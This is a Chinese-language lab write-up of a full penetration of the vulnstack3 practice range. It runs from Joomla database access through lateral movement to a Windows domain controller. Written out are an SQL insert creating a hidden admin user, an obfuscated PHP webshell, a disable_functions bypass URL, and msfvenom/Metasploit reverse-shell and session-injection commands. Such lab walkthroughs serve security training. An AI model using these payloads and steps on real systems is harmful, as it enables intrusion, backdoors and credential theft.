【红日靶场】vulnstack3-完整渗透过程

系列文章目录

【红日靶场】vulnstack1-完整渗透过程
【红日靶场】vulnstack2-完整渗透过程
【红日靶场】vulnstack3-完整渗透过程

---

---

基本信息

作者：licong

• 环境配置:
  打开虚拟机镜像为挂起状态，第一时间进行快照，部分服务未做自启，重启后无法自动运行。
  挂起状态，账号已默认登陆，centos为出网机，第一次运行，需重新获取桥接模式网卡ip。
  除重新获取ip，不建议进行任何虚拟机操作。
  参考虚拟机网络配置，添加新的网络，该网络作为内部网络。
  注：名称及网段必须符合上述图片，进行了固定ip配置。

描述
目标：域控中存在一份重要文件。
本次环境为黑盒测试，不提供虚拟机账号密码。

环境配置

centos重启一下网卡：

开始渗透

信息收集

目标为10.50.128.107：其他目标不知道


看这里的图标应该是joomla：

存在：s2-007

利用失败，应该是误报
dirb爆破目录：

这个是后台：

尝试使用joomla的poc：失败了

指纹识别：

暴力破解

上面有个3306爆破一下数据库：

漏洞利用

没想到是数据库弱密码：

这里数据库没有权限：

用HeidiSQL连接：

直接用这个数据库做提权试试：

还是不行，直接获取joomla用户名密码上面我们找到他的后台了：

将密码保存下来：

用john解密：

破解一会：

等它慢慢跑，再去找找其他的信息：phpinfo界面

joomla版本信息：

这个配置下面有个密码像是mysql的配置：
先测试一下登录后台

登录后台试试：

不是后台的密码：尝试了admin，testuser

尝试前台登录：

连接成功：

直接添加一个用户：

USE joomla;INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('julien', 'julien','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());INSERT INTO `am2zu_user_usergroup_map` (`user_id`, `group_id`)
VALUES (LAST_INSERT_ID(), '8');

这里直接给的密码加密过的方式

还能直接修改为：secret

我尝试插入数据但是加密过的数据不考虑joomla的加密方式直接修改数据库也是可以的：

还能尝试爆破使用john工具爆破，但这里用的应该是随机密码爆不出来：
直接登录后台：

写入shell：


写个蚁剑的免杀马：

保存

路径：

感觉像是免杀马问题没连上

突然想到上面的php版本是7而且禁用了很多危险函数：

用蚁剑的shell生成：

<?php $mXPo=create_function(base64_decode('JA==').str_rot13('f').str_rot13('b').str_rot13('z').chr(0x32e-0x2c9),base64_decode('ZQ==').chr(558-440).chr(0x17b-0x11a).chr(59940/555).base64_decode('KA==').chr(0x2a7-0x283).str_rot13('f').base64_decode('bw==').base64_decode('bQ==').base64_decode('ZQ==').str_rot13(')').chr(50622/858));$mXPo(base64_decode('OTEzO'.'DQ2O0'.'BldkF'.'sKCRf'.''.chr(474-389).chr(642-573).chr(026463/0313).str_rot13('G').chr(429-343).''.''.base64_decode('Rg==').chr(285-170).base64_decode('Mg==').base64_decode('Tg==').chr(01250-01076).''.'ZdKTs'.'yNzQx'.'NTM4O'.'w=='.''));?>

成功连接：

绕过

这里是因为函数禁用的原因：返回ret=127
绕过：https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

http://10.50.128.107/templates/beez3/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/tmp/bypass_disablefunc_x64.so

成功绕过：

内网信息收集

查看一下网卡：发现不对劲为内网段

尝试上线msf

上传：

加权限后运行：（失败了）

这里有个mysql文件夹：
这里添加了一个用户

这台主机的22端口是开放的尝试登录：
登录成功了

权限不够：

尝试上线msf（失败了，这里就不放了）
直接提权：
这里Linux kernel>2.6.22可以直接用脏牛

脏牛：https://github.com/Rvn0xsy/linux_dirty

提权到root了

查看一下网卡：

那上面那台主机使用的NGINX反向代理代理到这个网口的，所以刚刚的webshell是另外一台的主机：
现在做内网穿透将这台主机代理出来：我测试我这有问题（我的环境有安全设备拦截了msf的流量）

我这直接用内网网卡做：msf

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.93.128 LPORT=8888 -f elf > mshell.elfmsfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.93.128
set lport 8888
run

内网探测：



这台应该是NGINX反向代理那台：

fscna探测一下：

上线msf

上面没成功这里有root权限直接上传马上线：

横向移动

存在10和20还有30主机现在已经拿到了100和120主机的权限了，在拿下其他的主机：
先整理一下信息：
192.168.93.30 MSBROWSE\WIN7 Windows 7 Professional 7601 Service Pack 1
192.168.93.20 TEST\WIN2008 Windows Server ® 2008 Datacenter 6003 Service Pack 2
192.168.93.10 DC TEST\WIN-8GA56TNV3MV Windows Server 2012 R2 Datacenter 9600

域控制器应该是10地址上，其他win7可能是用户20可能是服务器：
端口方面：
192.168.93.10 ：主要关注135和445还有88端口389
192.168.93.20：主要关注80、445、1443和2383
192.168.93.30 ：主要关注135、139、443
尝试访问80端口：

这里可能存在CVE-2020-0618

我的内网可以直接访问：（大家需要做socke）
直接爆破一下smb:
kali使用smb登录：

在域内：

域控为10主机：其实fscan哪里也可以看到

看一下端口：

创建监听器：

msf 传达会话给cs

msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set prependmigrate true
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.93.128
lhost => 192.168.93.128
msf6 exploit(windows/local/payload_inject) > set lport 4422
lport => 4422
msf6 exploit(windows/local/payload_inject) > set session 2
session => 2
msf6 exploit(windows/local/payload_inject) > run

没成功多运行几次

抓取密码：

再次横向移动：

横向到域控

成功拿到域控

再次横向到30主机：（失败）443gg了，应该是授权的问题，这个win7太久没用了激活掉了
443也爆破不了

还有其他方式可以横向这个看自己爱好，这次先到这，拿到后可以权限维持，这里不在赘述。